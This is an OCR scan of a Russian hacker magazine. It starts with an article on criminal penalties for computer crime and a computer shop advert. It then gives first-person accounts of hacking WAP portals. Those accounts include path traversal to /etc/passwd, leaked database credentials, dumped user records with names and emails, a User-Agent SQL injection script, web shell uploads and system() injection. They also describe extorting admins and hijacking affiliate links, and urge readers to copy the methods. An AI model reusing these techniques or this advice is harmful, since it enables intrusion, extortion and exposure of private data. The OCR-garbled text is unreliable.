ГЛАВЕ «ПРЕСТУПЛЕНИЯ В СФЕРЕ КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ» . ПО ХОДУ ЧТЕНИЯ СТАТЬИ ТЫ САМ В ЭТОМ УБЕДИШЬСЯ. 

257648 5 6 3 7 





О Карты, деньги, два ствола 

дно из самых распространенных 
преступлений, совершаемых пос- 
редством сети, — кардинг. Здесь 
речь идет не только о реальной подделке плас- 
тиковых карт (на это есть отдельная статья), но и 
обо всех остальных его течениях. Хочу тебе ска- 
зать, что если ты практикуешь кардинг, то встал 
на скользкую дорожку, поскольку этим видом 
правонарушений занимается ФСБ ( И11р:/ЛзЬ.ш ). 
а для привлечения к ответственности совсем не 
обязательно заявление потерпевшего. Ты мо- 
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жешь и не подозревать, что за тобой уже давно 
пристально следят, и гости могут нагрянуть в са- 
мый неожиданный момент. 

Давай разберемся, что по закону есть «реаль- 
ный кардинг». Предположим, что ты подделыва- 
ешь банковские карты для их будущего обнала. 
Открываем УК и внимательно читаем 1 87 статью 
— «Изготовление или сбыт поддельных кредит- 
ных либо расчетных карт и иных платежных до- 
кументов». За это можно лишиться свободы на 
срок от 2 до 6 лет со штрафом в размере от 1 00 
до 300 тысяч рублей. А если вы работали сов- 



местно с соседом Васей, то можете попрощать- 
ся со свободой на срок от 4 до 7 лет со штрафом 
уже до миллиона рублей. Атеперь прикинь, сто- 
ит ли оно того. 

Рассмотрим другой пример, также из практики 
реального кардинга. Если ты занимаешься ре- 
альным обналом денег с изготовленной карты 
(в банкомате или магазине), то рискуешь быть 
привлеченным по 1 59 статье родного УК — мо- 
шенничество. Ведь, по сути, ты представля- 
ешься продавцу или банку реальным холдером 
пластиковой карты, злоупотребляя его дове- 
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ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ 
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рием. По закону, за это светит штраф до 120 тысяч рублей 
или лишение свободы до 2-х лет. А если твоими действиями 
причинен значительный ущерб (от 200 тысяч рублей), либо 
вас было, как минимум, двое, то рассчитывай на штраф до 
300 тысяч рублей или лишение свободы до 5 лет. В случае 
злоупотребления служебным положением грозит прямая 
дорога в тюрьму до 6 лет со штрафом до 10 тысяч рублей. 
Вот такая веселая арифметика :). 

Не оставим без внимания вещевой кардинг, который также 
является весьма популярным течением. Здесь целесооб- 
разно разделить преступления на следующие части: 
Добыча информации по платежным картам и ее владельцу. 
Зачастую за подобные действия тебе грозит 272 статья — 
«Неправомерный доступ к компьютерной информации». 
Для того чтобы преступление считалось оконченным, до- 
статочно совершить одно из действий: уничтожить, блоки- 
ровать, модифицировать или скопировать информацию. 
Если суд докажет, что ты похитил базу кредиток с раскру- 
ченного порносайта, то припаяют штраф до 200 тысяч руб- 
лей или упекут за решетку на срок до 2-х лет. А в случае ис- 
пользования служебного положения получишь штраф до 
300 тысяч рублей и лишишься свободы на срок до 5 лет. 
Продажа информации для последующего использования. 
Даже являясь реселлером баз платежных карт, ты наруша- 
ешь закон и рискуешь быть привлеченным по 183 статье 
УК — «Незаконное получение и разглашение сведений, 
составляющую коммерческую, налоговую или банковс- 
кую тайну» . За это светит штраф до 1 20 тысяч рублей или 
лишение свободы до 3-х лет. А если ты занимаешься про- 
дажей баз длительное время, и за этот период успел при- 
чинить крупный ущерб, то готовься заплатить до 20 тысяч 
рублей и попрощаться со свободой на срок до 5 лет. 
Использование информации для собственного обогаще- 
ния. Здесь существует два варианта: либо ты вбиваешь 
информацию о карте для покупки товара, либо для покупки 
услуг (музыки, софта и т.п.). В первом случае действует уже 
известная тебе 159 статья УК — «Мошенничество». Иначе 
165 статья — «Причинение имущественного ущерба путем 
обмана или злоупотребления доверием». Особенность дан- 
ной статьи — отсутствие каких-либо признаков хищения, что 
применимо к нематериальным ценностям. Предположим, что 
ты скардил полезную, но шареварную софтину, причинив 
владельцу имущественный ущерб. Г отовься отдать до 800 
тысяч рублей или просидеть в местах 
не столь отдаленных до 2-х лет. Со- 
гласись, что даже самая полезная 
прога не стоит этого. 

Продажа и покупка скарженного 
товара. Являясь продавцом или 
покупателем стаффа, есть риск 
быть привлеченным по 175 статье 
УК — «Приобретение или сбыт 



имущества, заведомо добытым преступным путем». Предпо- 
ложим, что ты поместил объявление на кардерском форуме 
о продаже стаффа. Этим сервисом воспользовался ряд кли- 
ентов. Ты и все твои клиенты могут поплатиться на 40 тысяч 
рублей или сесть в тюрьму на срок до 2-х лет. 

Не секрет, что в кардинге присутствует механизм отмыва 
денег. На этот счет у наших законодателей тоже нашлась 
статья 174(174.1) — «Легализация (отмывание) денежных 
средств или иного имущества, приобретенных другими 
лицами преступным путем» (либо лицом, совершившим 
преступление). Если тебя поймали за отмывом, то готовь 
120 тысяч рублей. В крупном размере — до 300 тысяч руб- 
лей. А если действовал на пару с соседом Васей, да еще 
используя свое служебное положение, то тебе грозит ли- 
шение свободы до 8 лет со штрафом до миллиона рублей. 
Согласись, немалый срок! 

О Ломать — не строить 

Поговорим о более безобидных правонарушениях: взлом 
ресурсов в глобальной сети. Бьюсь об заклад, что добрая 
половина читателей активно практикуют это преступление. 
Все они рискуют понести ответственность по старой доб- 
рой 272 статье, которую я уже описала. Стоит отметить, что 
если ты использовал информацию, полученную в результате 
взлома, то может иметь место не только 272, но и, например, 
165 статья УК. Эта статья может действовать в том случае, 
если ты получил доступ к диалапу (а может быть даже отдал 
аккаунт соседу Васе), причинив тем самым законному вла- 
дельцу имущественный ущерб. Следует отметить, что тебе 
не придется выбирать статью — впаяют обе :). 

Нередко несанкционированный доступ сопровождается 
попытками вымогательства. Скажем, ты взломал интернет- 



> Количество преступлений 
зарегистрированных с 1 997 
— 2003 год пост. 272 УК РФ 
в совокупности со ст. ст. 1 59, 
165, 187 УК РФ. 




1 998 - 1 999 2000 - 200.1 2002^2002 





> НДр:/ЛзЬ.ги — ФСБ 
РФ. 

Нйр://тѵсМогт.ги 

— МВД РФ. 
Ніір://сѵЬег-сгітез. 

Ш — Федеральный 
правовой портал о 
компьютерных пре- 
ступлениях. 
И11р://сѵЬегроІ.ги 

— компьютерная пре- 
ступность и борьба 
с ней. Здесь много 
интересных и доступ- 
ных материалов. 
ІпйрУ/хзегѵег.ги/изег 

— правовая библио- 
тека. 

Иі1р://агзѵ.гц — мой 
маленький сайт. 




> На диске ты 
найдешь полезные 
нормативно-право- 
вые документы (УК в 
том числе) и прочие 
интересные материа- 
лы по теме. 
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УСЛОВНОЕ ОСУЖДЕНИЕ - 
ТОЖЕ ОСУЖДЕНИЕ 

Нѳ сѳкрѳт, что за большинство «компьютерных» 
преступлений применяется условное осуждение. 
Многие считают, что в нем нет ничего страшного, 
но это совсем не так. При назначении условного 
осуждения судом устанавливается испытатель- 
ный срок, в течение которого необходимо дока- 
зать свое исправление. Кроме того, могут быть 
назначены дополнительные виды наказания, а 
также исполнение определенных обязанностей: 
не менять ПМЖ, работу, место учебы без уведом- 
ления контролирующего государственного орга- 
на, осуществляющего исправление, не посещать 
определенные места и т.д. В течение этого срока 
за осужденным осуществляется контроль специ- 
ализированным государственным органом, и по 
его представлению суд может отменить или до- 
полнить обязанности, а также снять судимость. 
Однако при уклонении от исполнения возложен- 
ных судом обязанностей или административном 
нарушении суд может продлить испытательный 
срок или отменить условное осуждение, заменив 
его реальным исполнением наказания. 

Еще один минус условного осуждения заключа- 
ется в том, что далеко не каждая организация 
решится принять осужденногонаработу.Отом, 
чтобы продолжать свою преступную деятель- 
ность, стоит хорошо подумать, поскольку при 
повторном преступлении, суд отменит услов- 
ное осуждение и назначит наказание по сово- 
купности приговоров (см. от. 69-74 УК). 

магазин и требуешь денег с его владельца за то, 
чтобы не было простоя в работе. Если это де- 
яние будет доказано в суде, то может светить до- 
полнительно и 1 63 статья — « Вымогательство» , 
которая наказывается лишением свободы на 
срок до 4-х лет со штрафом до 80 тысяч рублей. 
То же самое актуально для владельцев ботне- 
тов, которые шантажируют интернет-магазины 
и прочие ресурсы. 

Кстати, о ботнетах. Если ты владеешь большим 
числом ботов и любишь поЭЭоЗить случайные 
сайты, то рискуешь подпасть под 273 статью УК 
— «Создание, использование и распростране- 
ние вредоносных программ для ЭВМ». Статья 
распространяется на несанкционированное 
блокирование информации, которое произво- 
дится твоими ботами. Сие деяние наказывается 
лишением свободы на срок до 3-х лет со штра- 
фом до 200 тысяч рублей. Если же флуд по не- 
осторожности повлектяжкие последствия — го- 
товься лишиться свободы на срок от 3 до 7 лет. 
Та же самая статья касается любителей заслать 
троянов либо их авторов. В ней четко прописыва- 
ется, что к ответственности привлекается автор 



(распространитель) вредоносной программы, 
повлекшей за собой копированиелибо уничтоже- 
ние конфиденциальных данных. Стоит отметить, 
что некоторые вирусы способны нанести вред 
не только информации, но и аппаратной части 
(за примером далеко ходить не надо — вспомни 
известный ѴѴіп95.сіЬ). В наше время талантливые 
вирмейкеры пытаются написать заразу, выводя- 
щую из строя винты, мониторы и прочие девайсы. 
Помимо 273 статьи, ихждетещеодна — статья 167 
— «Умышленные уничтожение или повреждение 
имущества». Создателя подобного вируса ждет 
штраф до 40 тысяч рублей или лишение свободы 
на срок до 2-х лет (и это не считая положенного на- 
казания по 273!). Но в каждой бочке дегтя имеется 
маленькая ложка меда. Если будет доказано, что 
все вирусы ты просто коллекционировал в науч- 
ных целях или собирал их для создания антиви- 
русной программы (в общем, на пользу общест- 
ва), то наказания по статье 273 удастся избежать. 
Ты, наверное, думаешь, что сейчас я буду пугать 
еще и 274 статьей УК — «Нарушение правил 
эксплуатации ЭВМ, системы ЭВМ или их сети». 
Но это вовсе не так. Данная статья реже всего 
встречается на практике. Ведь для того, чтобы 
быть привлеченным по ней, необходимо работать 
администратором какого-либо предприятия (на- 
пример, завода) и своими действиями, наруша- 
ющими правила эксплуатации ЭВМ, причинить 
существенный вред производству. К примеру, ты 
работаешь на металлургическом заводе и име- 
ешь доступ к цеховому оборудованию (необяза- 
тельно к ПК) и решил понажимать на кнопочки в 
обход существующим правилам эксплуатации. 
Твои нехорошие действия привели к тому, что 
производство свежекатанных стальных загото- 
вок остановилось на несколько часов. Сам по- 
нимаешь, что по голове за подобное деяние не 
погладят — завод потерял кучу бабок из-за неза- 
планированного простоя. Вот тут-то и сработает 
заветная 274 статья УК, согласно которой, ты мо- 
жешь лишиться права занимать определенные 
должности на срок до 5 лет или сесть в тюрьму на 
срок до 2-х лет. А если одна из стальных болванок 
упала кому-нибудь на голову, то будь готов отпра- 
виться в места не столь отдаленные на 4 года. 

□ Эпилог 

В этой статье не описаны все возможные се- 
тевые преступления и ответственность за них, 
но, надеюсь, что изложенного будет достаточ- 
но для того, чтобы кто-то задумался, прежде 
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ВМЕСТЕ ВЕСЕЛЕЕ 

Зачастую сетевые преступления совершают- 
ся не в одиночку. Уголовный закон различает 
следующие преступные группы (см. от. 35 УК): 

1 . Г руппа лиц — два или более исполнителя 
без предварительного сговора. 

2. Г руппа лиц по предварительному сговору — 
два или более лица, заранее договорившихся 

0 совместном совершении преступления. 

3. Организованная группа — устойчивая группа 
лиц, заранее объединившихся для совершения 
одного или нескольких преступлений. 

4 . Преступное сообщество (преступная органи- 
зация) — сплоченная организованная группа, 
созданная для совершения тяжких или особо 
тяжких преступлений, либо объединение орга- 
низованных групп, созданных в тех же целях. 
Совершение преступления группой лиц влечет 
более строгое наказание. 

Существует несколько видов соучастников 
преступления (см. от. 32-34, 36 УК): 

1 . Исполнитель — лицо, непосредственно 
совершившее преступление или непосредс- 
твенно участвующее в его совершении сов- 
местно с другими лицами (соисполнителями). 

2. Организатор — лицо, организовавшее 
совершение преступления или руководившее 
его исполнением, а равно лицо создавшее 
организованную группу или преступное сооб- 
щество или руководившее ими. 

3. Подстрекатель — лицо, склонившее другое 
лицо к совершению преступления путем 
уговора, подкупа и т.д. 

4 . Пособник — лицо, содействовавшее совер- 
шению преступления: советами, указаниями, 
предоставлением информации, средств или 
орудий совершения преступления или устра- 
нением препятствий, а также лицо, заранее 
обещавшее скрыть преступника, следы пре- 
ступления, предметы, добытые преступным 
путем, а также заранее обещавшее приоб- 
рести или сбыть такие предметы. 

чем встать на путь интернет-нарушителя. Если 
же ты хочешь изучить вопрос преступления и 
наказания подробнее — советую прочитать 
следующую литературу: 

1 .Уголовный Кодекс РФ. 

2. Верин В.П. Постатейный комментарий кУК РФ. 

3. Курушин В. Д.,« Компьютерные преступления и 
информационная безопасность». 

4 . Вехов В.Б., «Тактические особенности рассле- 
дования преступлений в сфере компьютерной 
информации». 

5. Осипенко А.П., «Борьба с преступностью в 
глобальных компьютерных сетях: Междуна- 
родный опыт», з: 
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Іпіеі® Репііит® й и откройте новые 
возможности Вашего ПК. 



РепгіитО 

іпзіде™ 



Два ядра. 
Делай больше. 



о 



' 



г Л 



Новейшие технологии 
и надежный уровень 
производительности 



Сделайте Ваш выбор в пользу компьютеров 
РІехігоп на базе двухъядерного процессора 



КАИ* 

постоянного 

ПОКУПАТЕЛЯ 



м-4 а» ?»■ 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



Адреса салонов-магазинов: 

м. «Бабушкинская», м. «Улица 1905 года», 
ул. Сухонская, 7а ул. Мантулинская, 2 



м. «Владыкино», 
Алтуфьевское ш., 16 



При покупке компьютера 
Ріехігоп получи Карту 
постоянного покупателя 



Единая справочная: (495) 105-64-47 



Интернет-магазин: жѵѵѵѵ.ісепіег.гіі 



Ріехігоп Ргешіега О 

домашний компьютер 

• Процессор Іпіеі® Репіі и т® О 805 2.66 ГГц 

• Оперативная память 512Мб БОР II 

• Видеокарта А51І5 «ЕАХІбООРго/ТО» 256МБ 

• Жесткий диск 160 ГБ 

• Привод ОѴО/СО-Ш 

• Місгозоіі ѴѴіпсІоѵѵз ХР Ноте ЕсІШоп 5Р2, рус. 



Ріехігоп ІІпіѵегве О 

мультимедийный центр 

• Процессор Іпіеі® Репіі шті® Б 820 2.8 ГГц 

• Оперативная память 512Мб ОйР II 

• Видеокарта ЗаррГііге «Рабеоп Х1600 Рго» 256МБ 

• Жесткий диск 160 ГБ 

• Привод 0\Ю -РѴѴ 

• Місгозоіі ѴѴіпсІоѵѵз ХР Ноте ЕсІШоп 5Р2, рус. 



в подарок. 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо І_о§о, Соге Іпзісіе, ІпТеІ, ІпТеІ І_о§о, ІпТеІ Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе Ьо^о, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іп; 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории сГ 






Ріехігоп Махіѵпа О 

игровая станция 
нового поколения 

• Процессор Іпіеі® Репііит® О 930^§|Гц | 

• Оперативная память 1 Гб БОРІ 

• Видеокарта Зарріііге «Расіеоп Х1600 Рго» 256МБ 

• Жесткий диск 160 ГБ 

• Привод 0\Ш -ПѴѴ 

Місгозоіі ѴѴіпсІоѵѵз ХР Ноте ЕсІШоп 5Р2, рус. 
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ИСТОРИЯ ВЗЛОМА КРУПНЕЙШИХ ѴѴАР-САЙТОВ 



Мобильный взлом 



каждый день мы пользуемся сервисами крупнейших русскоязычных ѵѵар-саитов. но мало кто знает, что 
эти сайты, как и их собратья в большом инете, содержат уязвимости, совсем недавно мне удалось поло- 
мать некоторые ѵѵар-ресурсы, ЧТО ДОСТАВИЛО НЕМАЛО неприятностей их администраторам, а ломал я через 

ВСЕМ ИЗВЕСТНЫЕ БАГИ — ЗОЬ-ІШЕСТЮМ, ТВАѴЕВЗ ОІРЕСТОРУ И Т.П. УДИВЛЕН? Я ТОЖЕ БЫЛ УДИВЛЕН, КОГДА НАХОДИЛ 
ИХ НА КРУПНЫХ ѴѴАР-ПОРТАЛАХ. А ПОТОМ ПРИВЫК :). 



□ орошиѳ вап-программеры обычно нѳ 
пользуются готовыми скриптами, а 
пишут их сами. А также нередко зака- 
зывают нужную программу у хорошего и проверен- 
ного человека за І\І-ную сумму веб-манек. Но в этом 
и заключается вся опасность: такие мобильные 
форумы, чаты, боѵѵпіоасі-центры практически всег- 
да имеют какой-нибудь нелепый баг. Здесь все так 
же, как при взломе обычных ресурсов. Единствен- 
ная трудность заключается в использовании спе- 
циального языка разметки ѵѵппі в ѵѵар-страницах. 
Но тут все так же, как и в простом ИітІ. Только не 
удивляйся тому, что после открытия ѵѵар-страницы 
вместо привычного <Ьгт асІіоп="" теІЬосІ="ро5Г> ты 
увидишь какой-то опсіпогхдо ГігеЬ"" теІІпосІ="розі">. 
Если тебе потребуется внести нехороший символ 
в одну из переменных, передаваемых скрипту из 
ѵѵті-страницы, нужно будет всего лишь немного 



осмотреться и действовать по аналогии с ИітІ. А 
вообще, прибегать к просмотру чистого ѵѵті при- 
ходится крайне редко — все хакерские действия 
совершаются в строке ШІ_-браузера. 

Давай определимся, что мы сможем поиметь от 
взлома ѵѵар-сайта? Бесплатные мелодии и кар- 
тинки? Это вряд ли, ведь они и так выложены бес- 
платно. Халявный доступ к платным сервисам и 
онлайн-играм? Это уже лучше — некоторые ре- 
сурсы их действительно предоставляют. Но са- 
мую большую выгоду можно получить от продажи 
исходных кодов эксклюзивных скриптов, распо- 
ложенных на мобильных порталах. Для экстрема- 
лов подойдет способ смены партнерских ссылок 
на свои :). То есть все деньги от продажи платного 
контента партнеров могут пойти тебе в карман. 
Если, конечно, админ не заметит такой подставы. 
А теперь я хочу рассказать несколько поучитель- 



ных историй взломов известных ѴѴАР-порталов 
со счастливым концом. 

О ѵѵар.ктх.ги — надежный 
конструктор 

Сейчас очень модно создавать мобильные сайты, 
просматриваемые прямо с экрана сотового теле- 
фона. Владельцы этих сервисов-конструкторов 
получают огромные деньги, размещая рекламные 
и партнерские ссылки на сайтах своих клиентов. 
Одним из порталов, предоставляющих такую ус- 
лугу, является ѵѵар.ктх.ги . Пользователям этого 
конструктора предоставлены широчайшие воз- 
можности по созданию и редактированию своих 
страниц. Как утверждают сами создатели ктх: 
«Мы — эксперты сайтостроения!». Но так ли это? 
20 000 пользователей сервиса действительно так 
считают, а я почему-то сразу не поверил и, заре- 
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> Іетріаіе главной страницы ѵѵер.ги 

гистрировав свой сайт с помощью веб-браузѳра 
Орега, начал изучать внутреннее устройство 
скрипта. После недолгого хождения по ссылкам 
мне посчастливилось наткнуться на такой инте- 
ресный пункт, как «Импорт файлов через ІІПІ_». 
Эта фишка позволяет загрузить на свой сайт раз- 
личный контент для мобильного телефона. Стра- 
ница раздела содержала 2 поля ввода: «ІІПІ_» 
и «Сохранить как...». Недолго думая, я вписал в 
ІІРЬ значение ../../../../../../../../еіс/раззѵѵб, а в поле 
«Сохранить как...» — раззѵѵб.ѵѵті. Я представил, 
что вполне возможно значение Шр:// указано для 
красоты, а в скрипте его наличие не проверяется. 
Действительно, после нехитрого злодеяния в моей 
папке для ѵѵті-страничек появился новый файл с 
содержанием /еіс/раззѵѵсі :). Дальше я попробовал 
прочитать содержимое директории с помощью 
этой баги. Значки ../../и функция геаб!іІе() помогли 
мне выйти в корень конструктора. Продолжив изу- 
чать по очереди все *.рИр-скрипты, я наткнулся на 
параметры доступа к базе данных конструктора в 
файлике/Иоте/ктх/\длдлд//гоіа1іоп_гекІата_25.рЬр. 

с1еЯпе("ОВМате","ктх"); 

сІеЯпе("Но5ІМате","ІосаІІпозГ); 

ЦейпеСизегЫатеѴктх"); 
бей пе(" Раззѵѵогб " , "ктх-Тюзіі пд") ; 

Отличный пароль для такого серьезного проек- 
та. Что удивительно, он подошел к Ир! Получив 
доступ к серверу, я тут же слил все файлы конс- 
труктора и базу данных к себе на жесткий диск. 
Вот часть дампа базы клиентов этого хостинга- 
конструктора: 

ІІЧЗЕРГГ ІІЧТО 'изегз' ѴАШЕ5 (12965,'ктх'ДеЬгапа'ДеІпгап 
а', ' 1 561554961 ',0, 1 1 1 2326239, 111 2326250, ЧагісГ, 'пабігоѵ' , 
'пСт55@таіІ.ги',0,5242880,0,"); 

ІІЧЗЕРГГ ІІЧТО 'изегз' ѴАШЕ5 (14642,'ктх','еІкаІап І , І уадиЬ 
одіи','7381022744',0,1 1 13300485,1 1 13300500, 'ЕІШЕІЧІ2',' 
МАМЕООѴ','еІкаІап@таіІ.ги'Д5242880,0, И ); 

ІІЧЗЕРГГ ІІЧТО 'изегз' ѴАШЕ5 (12961,'ктх','зкуктхги','тіх' 
,'241 71 59245', 632235923,1 11 2322498,1 1 1 23251 57,'раѵеГ 
,'Іѵапоѵ', ",0,5242880, 0,"); 

ІІЧЗЕВТ ІІЧТО 'изегз' ѴАШЕЗ (12960,'ктх','Ш','1 31 313748 
32612542', 955559136,1 1 12320276,1 1 12797484, 'Саша', 'Я 
щенко','ШІІ@даІа.пе1:',0,5242880,0,"); 

ІІЧЗЕРГГ ІІЧТО 'изегз' ѴАШЕЗ (12959,'ктх','соІсІ- 
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рипкѴНоі', 1 1097662073', 0,1 1 12319078, 

1 1 1231 9089, 'ІІ\'уа','Уаѵогзку,'соІб-рипк@таіІ. 
ги', 0, 5242880, 0,"); 

Итак, я мог рулить всеми сайтами конструктора. 
Вообще, у меня была идея их удалить, но я не 
стал этого делать, так как админ ктх развернул 
нешуточную антихакерскую деятельность. Он 
проверил все свои скрипты на баги и подключил 
к защите сервера своих знакомых из спецслужб 
(как он сам говорил). Но, несмотря на это, мне с 
товарищами все же удалось несколько раз про- 
дать эти эксклюзивные хостерские скрипты за 
кругленькую сумму. 

О зесІиЬ.огд — вакханалия в чате 

Что такое мобильный чат? Это бессонно про- 
веденные ночи у экрана телефона, настоящая 
дружба и виртуальная любовь, которые всюду 
ходят с тобой в кармане. Самые лучшие вап-чаты 
обычно размещены наболее или менее посещае- 
мых порталах, одним из которых является зесІиЬ. 
ога — клуб любителей трубок от ЗопуЕгісззоп. 
Этот популярнейший ѴѴАР-портал с не менее 
популярным чатом тоже оказался подвержен- 
ным взлому. Именно из-за моих приколов над 
пользователями админы клуба вынуждены были 
написать свой новый чат с нуля, а не пользовать- 
ся купленным у ѵѵар.ѵѵаЬ.ги скриптом. А с чего же 
все началось? Как-то раз, сидя в аське, я узнал у 
хорошего знакомого про то, что этот чат записы- 
вает в базу данных переменную с юзер-агентом 
($НТТР_113ЕРДАОЕ1\1Т) без каких-либо прове- 
рок. Переварив эту инфу и зная о том, что поле 
с правами пользователя в БД называется «ІеѵеІ», 
я решил проверить чат на зці-іпіесііоп. Я накатал 
простенький рНр-скрипт, увеличивающий «ІеѵеІ» 
на несколько пунктов: 

<? 

$1р = Гзоскореп( и зесІиЬ.огд и , 80, $еггпо, $еггзГг, 30); 

$оиГ = "(ЗЕТ /сІпаУсІпаІрІпр?іб=41 71 1 &рз=ГезГа2&гт=4&г 
еЩ 169569 НТТР/1 .1Ѵ\п"; 

$оиі .= "НозГ: зесІиЬ. огд\г\п"; 

$оиі .= "Соппесііоп: СІозеѴХп"; 

$оиі .= "ЕІзег-Адепі: 1',ІеѵеІ='Аг\пѴ\п"; 

Гѵѵгі1:е($Гр, $оиі); ГсІозе($Гр); 

?> 



И запустил его на Денвере. После чего, зайдя в 
чат, увидел много новых возможностей: Админ- 
ская комната, Панель управления администра- 
тором, кнопка смены заголовка комнаты и т.д. 
Админы раз за разом убирали мой статус, а я 
снова и снова проделывал этот нехитрый трюк, 
становясь администратором. Так как этот скрипт 
со временем стал доступен всем и каждому, ты 
можешь поискать его в вапе и поглумиться над 
тупыми администраторами. Распознать такой чат 
можно по специфической странице гедНеІр.рНр 
(в другихчатах регистрация оформленалибо сов- 
сем без страницы с правилами и помощью, либо 
эта пага называется по-другому), на которую ты 
попадаешь сразу после нажатия кнопки «Регист- 
рация» в главном меню. 

О ѵѵар.зіетепз-сІиЬ.ш — кривые руч- 
ки кодеров 

А теперь самое вкусненькое. УѴар.Зіетепз-СІиЬ. 
Ри - вап-представительство сименс-клуба, на 
сегодняшний день является одним из самых по- 
сещаемых ресурсов рувапа с очень высоким до- 
ходом. На нем находятся тонны отсортированных 
загрузок: \л/аѵ, ттГ-мелодии и т.п. Резон для взло- 
ма этого портала был очень весомым: возмож- 
ность шантажа и получения денег. 
Разработчиком движка для вап сименс-клуба 
является человек с ником Іаз!ф (его вап-сайт — 
ІазібщеШ), кодер довольно неплохой, но невни- 
мательный. Практически в каждый параметр его 
скриптов можно было вставить кавычку для зці- 
инъекции (уже потом за умеренную плату адми- 
ны клуба попросили меня указать их). В общем, 
их движок был полностью дырявым. Но самая 
главная бага открывалась взору, если в Опере 
пройти по вкладке Сервис->Быстрые настройки 
и нажать «Представляться как Іпіегпеі ехріогег», 
а не как Орега, что стоит там по дефолту. После 
выполнения этой нехитрой процедуры по адресу: 
ѵѵар.зіетепз-сІиЬ.ги можно увидеть веб-форму 
для загрузки своих файлов в вап-обменник (сей- 
час он находится по адресу: ННрѴАл/ар.зіетепз- 
сІиЬ.щ/?тосІ=ппосІ бтеіобѵ ). Сначала я попробо- 
вал загрузить веб-шелл, содержащийся в файле 
ІезЕірд.рИр. Не прокатило: расширение жестко 
проверялось. Затем, немного подумав, переиме- 
новал файл в Іезі.рИр.ірд. Скрипт спокойно про- 



/081 



ХАКЕР 08 /92/ 06 



» 



взлом 





ййгкшкі. 

ГОШМ 



■-Ч«*ЧТЪІ 






> Исходник главной страницы ѵѵар.кплх.ги 



> Партнерки 
намурик.ру 



Пцмі|ігміам И^й 



ѵІЧ 

-■Іи». 



’ Ні» 

■‘■ ■ч-фі-л ІЬНИ -паЗ 1 1.І ■ й-л— І 




СП 



> Форма загрузки файлов на сименс-клубе 



глотил мой шелл и даже любезно обрезал «.ірд», 
оставив просто файл ІезІрНр. Что было дальше, 
думаю, не стоит объяснять. После изучения сер- 
вера, поиска всех явок, паролей и доступов я пос- 
тучал в асю к одному из админов сименс-клуба 
и потребовал за информацию о дырке немного 
зеленых денег на подставной кошелек. Админ, 
естественно, мне не поверил и создал тестовый 
файл рПр в корне сайта, попросив меня раскрыть 
его содержание. Что я и сделал. Но админ снова 
не понял всю серьезность ситуации. Тогда я уда- 
лил из загрузок весь раздел с іаѵа-книгами .Толь- 
ко после этого товарищ администратор осознал, 
что нужно что-то делать, перевел мне запрошен- 
ную сумму — ия рассказал ему о дырке. А потом 
все тихо и мирно разошлись. 

Думаю, этот пример наглядно показал, почему не 
стоит доверять непроверенным кодерам. 

О ѵѵар.турик.ги — качаем деньги 

В свое время (2003-2004 годы) ѵѵар.тѵрик.ги был 
самым посещаемым порталом рувапа. Люди за- 
ходили на него благодаря неплохому по тем вре- 
менам чату и огромному каталогу ссылок. После 
появления партнерских программ админ ресур- 
са решил первым их испытать и поставил насвой 
сайт эти самые партнерские ссылки. Деньги 
полились к нему рекой, и мы с товарищами ре- 
шили, что он должен поделиться. Наверно, всем 
уже приелась бага рПрЫэ-форума в параметре 
ПідЫідІіі, но именно она нам помогла. У Мурика 
как раз был установлен такой форум с неплохой 
вап-модификацией. Собственно, в вап-рПрЬЬ 
бага не работала, а вот в веб проходила на ура. 
Причем права на запись, удаление и т.д. файлов 
были полными. В результате залития шелла на 
сервер мы смогли рулить крупнейшим сайтом 
рувапа около двух недель. И все эти две недели 
на несколько часов меняли партерские ссылки 
контент-провайдеров ріаѵіоп.ги и тесІіатоЫІе.ги 
н а с во и . Это зам етить б ы л о сл ожн о , так как такая 
партнерская ссылка имеет следующий вид: 
ИПр://ѵѵарЬ2Ь.рІаѵІоп.ги/р/сИт.ѵѵтІ?сІ=232234 . 
где «6=232234» — ид партнера. Так мы ставили 



свой ид и продавали на чужом портале около 60- 
80 игр в день. Правда, деньги за эти игры мы так 
и не получили, так как, совершенно обнаглевши, 
стали заменять ссылки уже не на пару часов, а на 
весь день. В результате Мурик заметил обман и 
нажаловался контент-провайдеру, который за- 
блокировал наш аккаунт и перевел все деньги 
обратно Мурику. 

Этот взлом можно считать неудачным, но сам 
прецедент и идея впечатляют. Если тебе удастся 
взломать какой-нибудь крупный вап-портал, поп- 
робуй поднять денег именно таким способом, но 
сильно не наглей. 

О ѵѵар.ЬосІг.пеІ — месть 

И снова популярнейший вап-портал с тоннами 
загрузок. В свое время с админом бодр. нет у нас 
сложились очень натянутые отношения. Мы зака- 
зали вап-конструктор у знакомого кодера за не- 
плохие деньги, затем этот же кодер продал наш 
конструктор и бодру. После началась история 
взаимных взломов именно через этот конструк- 
тор. Итак, сам скрипт у бодра расположен по ад- 
ресу: \д/ар4.ш . После регистрации пользователь 
попадает в стандартное меню, где можно залезть 
сразу же в редактирование главной страницы 
іпбех.ѵѵті . Я сразу зашел в этот раздел , и в каждое 
из полей (Текст, ІІВІ_, Картинка и т.д.) ввел симво- 
лы: ' < > $, чтобы проверить, режутся ли тэги. Тэги 
не резались только в поле « Картинка» . Это очень 
хорошо. Затем я открыл исходный ѵѵті-код стра- 
ницы редактирования и нашел тэг анкора (аналог 
<1огт> в ИілпІ): <апсЬогіШе="до">ОК!<до Ьге1 : ="есІійехІ 
рЬр?іЦ=32019&атр;р=1:е5іО2&атр;раде=іпсІех. 
ѵѵтІ&атр;і=5" те1ІпосІ="ро5Г>. Изменил его на: опсЬог 
МІе="до">ОК!<до Ьге1 : ="Іпйр://\л/ар4.ги/есІійехІрІпр?ісІ=3 
2019&атр;р=іез1:о2&атр;раде=іпсІех.рЫ:тІ&атр;і=5" 
теіІпосІ="розГ>. И сохранил страничку на жестком 
диске. Ты спросишь, почему именно іпбех.рИітІ, 
а не іпбех.рНр? Привычка :). Обычно админы за- 
бывают про это расширение рИітІ, и в случае с 
бодром это тоже оказалось верно. 

После открытия сохраненной паги я ввел в поле 
картинки значение <?зузіет($стсІ)?>, после чего 



нажал кнопку «Ок» и получил полноценный 
шелл на ѵѵар4.ги . Затем мы с товарищами стали 
шантажировать бодра и сняли с него немного 
